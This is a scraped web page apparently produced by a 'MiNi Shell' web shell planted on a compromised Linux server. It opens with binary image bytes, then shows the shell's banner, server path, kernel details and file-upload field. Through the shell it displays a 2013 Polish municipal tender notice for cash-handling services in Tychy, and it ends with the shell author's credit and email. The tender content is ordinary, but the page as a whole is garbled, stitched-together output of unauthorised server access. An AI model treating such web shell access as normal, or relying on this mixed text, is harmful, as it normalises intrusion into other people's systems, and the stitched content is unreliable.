JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131119/470910-N-2013.html

<p class="kh_header"><b>Tychy: OBSŁUGA KASOWA MIEJSKIEGO ZARZĄDU BUDYNKÓW MIESZKALNYCH W TYCHACH</b><br>
<b>Numer ogłoszenia: 470910 - 2013; data zamieszczenia: 19.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OBSŁUGA KASOWA MIEJSKIEGO ZARZĄDU BUDYNKÓW MIESZKALNYCH W TYCHACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przyjęcie i prowadzenie obsługi kasowej w punktach kasowych 
    w zakresie: przyjmowania wpłat gotówkowych od podmiotów zobowiązanych względem 
    Zamawiającego jak i podmiotów zobowiązanych wobec kontrahentów Zamawiającego z którymi 
    ten ma zawarte umowy oraz odprowadzanie ich na właściwe rachunki bankowe.
1.	Wykonawca będzie przyjmował wpłaty gotówkowe :
    -   na podstawie karty opłat z wykorzystaniem systemu komputerowego Zamawiającego na  
    sprzęcie komputerowym Wykonawcy. Po zakończeniu każdego dnia roboczego Wykonawca 
    zobowiązany jest wygenerować z systemu komputerowego raporty kasowe oraz przekazać je 
    Zamawiającemu  
    -   w pozostałych przypadkach, w których wpłacający nie posiada karty opłat, wpłata zostanie    
    przyjęta na bankowym dowodzie wpłaty Wykonawcy.   
2.	Przekazanie przyjętych przez Wykonawcę kwot  na rachunki Zamawiającego nastąpi najpóźniej   
      w następnym dniu roboczym jako:
   -   sumy wpłat na podstawie raportu kasowego (wpłaty przyjęte na podstawie systemu  
   Zamawiającego)
   -   wpłat przyjętych na bankowych dowodach wpłaty Wykonawcy
3.	Wykonawca zobowiązany jest oprócz raportów kasowych przekazać Zamawiającemu nie     później niż:
    -  na koniec każdego dnia roboczego wytworzone pliki elektroniczne w systemie komputerowym   
    Zamawiającego, poprzez przesłanie ich wewnętrzną siecią komputerową Zamawiającego
    -   w następnym dniu roboczym dzienne wykazy w formie papierowej.
    Wykazy winny zawierać dane pozwalające zidentyfikować wpłacającego tj.:
    -   nazwisko i imię/nazwa firmy
    -   adres, którego dotyczy wpłata
    -   tytuł wpłaty - z wyszczególnieniem kwoty należności głównej i ewentualnych odsetek (bądź 
    innych należności ubocznych)
    -  wysokość dokonanej wpłaty
    -  numer ewidencyjny lokalu stosowany w MZBM Tychy.
4.	Wykonawca będzie przyjmował wpłaty z tytułu należności MZBM Tychy z wykorzystaniem 
   systemu komputerowego Zamawiającego, na sprzęcie komputerowym Wykonawcy 
   przystosowanym do oprogramowania sieciowego Zamawiającego- Novell 5, Protokół IPX/SPX,      
   program współpracujący z DOS.
   Wymagany:
   -   port COM 9 PIN (drukarka paragonowa EPSON TM 930),
   -   port PS2 (czytnik kodów obsługujący code 39), 
   -   wolna pamięć minimum 550 kB,
   -   drukarka igłowa 10 cali  do wydruków raportów dziennych.
   Potwierdzeniem przyjętych wpłat będą raporty kasowe oraz pliki elektroniczne zawierające  
   informacje o wpłatach dokonanych w danym dniu.
5.	Szacunkowa ilość wpłat za okres 12 miesięcy z tytułu należności głównych dokonywanych
   za pośrednictwem Wykonawcy wynosi około 98 000 sztuk. 
6.	Zamawiający ustala następujące zasady prowadzenia punktów kasowych: 
a)	 punkty kasowe prowadzone będą w pomieszczeniach znajdujących się w siedzibach 
     Zamawiającego pod niżej wymienionymi adresami:
   -  Rejon Obsługi Mieszkańców Nr I  Tychy, ul. Arkadowa 9c
    -  Rejon Obsługi Mieszkańców Nr II  Tychy, ul. Budowlanych 41
    -  Rejon Obsługi Mieszkańców Nr III Tychy, ul. Cyganerii 43
    Udostępnienie punktów kasowych nastąpi odpłatnie na podstawie odrębnych umów najmu.
b)	Wykonawca na własny koszt dostosuje pomieszczenia punktów kasowych do warunków 
     pozwalających na należyte wykonanie niniejszego zamówienia, w szczególności wyposaży je w 
     niezbędną infrastrukturę informatyczną i teletechniczną, sprzęt biurowy oraz wszystkie 
     urządzenie niezbędne do wykonania zamówienia.
c)	punkty kasowe będą czynne w godzinach pracy Zamawiającego, tj.:
    -  w poniedziałki od godziny 700 do godz. 1700 , 
    -  wtorki - czwartki od godziny 700 do godz. 1500,
    -  w piątki od godziny 700 do godz. 1300.
    -  oraz w dniu 10-tego każdego miesiąca (o ile jest to dzień roboczy), od godz.700 
             do godz. 1700
d)	 w przypadku zmian godzin pracy Zamawiającego, Wykonawca zobowiązuje się dostosować 
  godziny otwarcia punktów kasowych do wymagań Zamawiającego.

7.	 Wykonawca uruchomi punkty kasowe w terminie od 02.01.2014 r. 

8.	Zamawiający może przekazać Wykonawcy w użytkowanie drukarki paragonowe oraz 
       czytniki kodów służące do obsługi systemu komputerowego Zamawiającego -  odpłatnie 
       na podstawie umowy dzierżawy stanowiącej załącznik do umowy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w trybie zamówienia z wolnej 
ręki, których wartość nie przekroczy 50 % wartości zamówienia podstawowego, na zasadach 
określonych w art. 67 ust.1. pkt 6) ustawy - Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.01.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium wysokości:
2 500,00  zł  (słownie:  dwa tysiące pięćset złotych) - na czas związania ofertą.
2.	Wadium musi być wniesione przed upływem terminu składania ofert.
3.	Przy wnoszeniu wadium Wykonawca winien powołać się na nazwę przetargu.
4.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu:
wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:
Bank PKO S.A.  o / Tychy
Nr rachunku bankowego: 71 1020 2528 0000 0202 0267 3846
Wadium wniesione w formie pieniężnej musi znajdować się na koncie Zamawiającego przed upływem terminu składania ofert.
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,                    
d)	gwarancjach ubezpieczeniowych, 
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dn. 09.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275 , z późn. zm.).
5.	W przypadku wadium wniesionego w formie innej niż pieniężna - oryginał dowodu wniesienia   wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego, w Tychach przy ul. Filaretów 31 w Dziale Księgowości (pokój nr 4), natomiast kopię dowodu wniesienia wadium należy załączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia warunek udziału w postępowaniu, dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania (art. 22 ust. 1 pkt 1 ustawy - PZP), 
        Zamawiający wymaga złożenia następujących dokumentów:

      1)  w przypadku instytucji bankowych   -  aktualne zezwolenie Komisji Nadzoru 
           Finansowego na wykonywanie czynności bankowych wydane na podstawie przepisów 
           ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz. U. z 2012 poz. 1376 z późn. zm.); 

     2)   w przypadku krajowych instytucji płatniczych, biura usług płatniczych, krajowych instytucji 
           pieniądza elektronicznego oraz ich oddziały i agenci  tych podmiotów wykonujący 
           działalność agencyjną w zakresie świadczenia usług płatniczych, oddziały zagraniczne 
           instytucji pieniądza elektronicznego, a także kasy oszczędnościowo - kredytowe oraz ich 
           oddziały  -  wpis do rejestru krajowych instytucji płatniczych i innych dostawców 
           prowadzony przez Komisję Nadzoru Finansowego na podstawie art. 4 ust. 3 ustawy 
           z dnia 19 sierpnia 2011 r. o usługach płatniczych (Dz. U. z 2011 r. Nr 199, poz. 1175 
           z późn. zm.); 
         
          Uwaga:  wymagane dokumenty muszą być wystawione na Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  wykonawca spełnia warunek udziału dotyczący posiadania wiedzy i doświadczenia (art. 22 ust.1 pkt 2 ustawy - PZP), Zamawiający wymaga złożenia następujących dokumentów: 
     1)  wykazu wykonanych, a przypadku świadczeń okresowych lub ciągłych również  
          wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu 
          składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, 
          wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których 
          usługi zostały wykonane, w którym należy wykazać co najmniej: 
-	 dwie usługi (zrealizowane/ realizowane w ramach dwóch odrębnych umów) w zakresie 
    prowadzenia obsługi kasowej przez okres co najmniej 6 miesięcy, o wartości nie mniejszej 
    niż  50 000,00 zł (brutto) - każda z usług

        lub
-	jedną usługę (zrealizowaną/ realizowaną w ramach jednej umowy) w zakresie prowadzenia 
     obsługi kasowej  przez okres min. 12 m-cy, o wartości nie mniejszej niż  100 000,00 zł 
     (brutto).
       
      2) do wykazu należy dołączyć dokumenty potwierdzające, że usługi wskazane w wykazie 
           zostały wykonane lub są wykonywane należycie.
           Dowodami, o których mowa powyżej są:

a)	 poświadczenie, z tym że  w odniesieniu do nadal wykonywanych usług okresowych lub
      ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem 
      terminu składania ofert
b)	 oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze 
     wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt. a)

          W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane 
          w wykazie zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania 
     poświadczeń, o których mowa powyżej.

          Zgodnie z  § 9 ust. 2 rozporządzenia , w postępowaniach o udzielenie zamówienia 
          wszczynanych w okresie 12 miesięcy od dnia wejścia w życie rozporządzenia, wykonawca 
          w miejsce poświadczeń , o których mowa w § 1 ust. 2 pkt 1 może przedkładać dokumenty 
          potwierdzające należyte wykonanie usług , określone w § 1  ust. 1 pkt 3) rozporządzenia 
          Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich 
          może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być 
          składane ( Dz. U. Nr 226 poz. 1817)

           Wykaz usług należy sporządzić - wg wzoru druku stanowiącego załącznik nr 3 do SIWZ.     
         (W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać 
         łącznie  lub co najmniej jeden z Wykonawców).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Zamawiający nie precyzuje w tym zakresie sposobu oceny spełniania warunku udziału         
         w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  Zamawiający nie precyzuje w tym zakresie sposobu oceny spełniania warunku udziału         
         w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia , że  wykonawca spełnia warunek udziału dotyczący posiadania
         wymaganej sytuacji ekonomicznej i finansowej  (art. 22 ust. 1 pkt. 4 ustawy - PZP), 
         Zamawiający wymaga, złożenia następujących dokumentów: 

2)	opłaconej polisy, a w przypadku jej braku , innego dokumentu potwierdzającego, że 
   wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
   działalności związanej z przedmiotem zamówienia 
   -    wymagane jest posiadanie ww. dokumentu o wartości ubezpieczenia nie mniejszej 
   niż  100 000,00 zł.
         Do oferty należy dołączyć potwierdzenie opłacenia polisy l u b  fakt  jej opłacenia 
         musi wynikać z treści dokumentu.
         Jeżeli fakt opłacenia polisy lub innego dokumentu potwierdzającego, że wykonawca 
         jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
         związanej z przedmiotem zamówienia, nie wynika wprost z załączonego do oferty
         dokumentu wykonawca jest zobowiązany dołączyć inny dokument potwierdzający 
         opłacenie składki (np. kopia przelewu składki, potwierdzenie ubezpieczyciela).

                                            (W przypadku podmiotów występujących wspólnie warunek ten  wykonawcy mogą spełniać  
łącznie lub co najmniej jeden z wykonawców). 

         Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów 
         dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, 
         może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie  
         opisanego przez Zamawiającego warunku (art. 26 ust. 2 c ustawy PZP).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany formularz ofertowy -  sporządzony według wzoru stanowiącego   
      -  załącznik nr 1 do SIWZ
2)	Wypełniony i podpisany formularz oferty cenowej - załącznik nr 1a
3)	stosowne pełnomocnictwo (a) do działania w imieniu wykonawcy w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.
4)	w przypadku wykonawców wspólnie ubiegających się się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego
5)	dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w następujących przypadkach:
a)	zmiany przepisów ustawy o podatku od towarów i usług w zakresie wysokości stawki VAT;
b)	zmian personalnych, adresowych, formy prawnej stron umowy.
c)	zmian adresowych , lokalizacyjnych punktów kasowych
d)	zmiany ilości punktów kasowych
e)	zmiany sposobu rozliczania przedmiotu umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http: // bip.umtychy.pl/jednostki-organizacyjne-miasta/35<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny , 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.11.2013 godzina 11:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com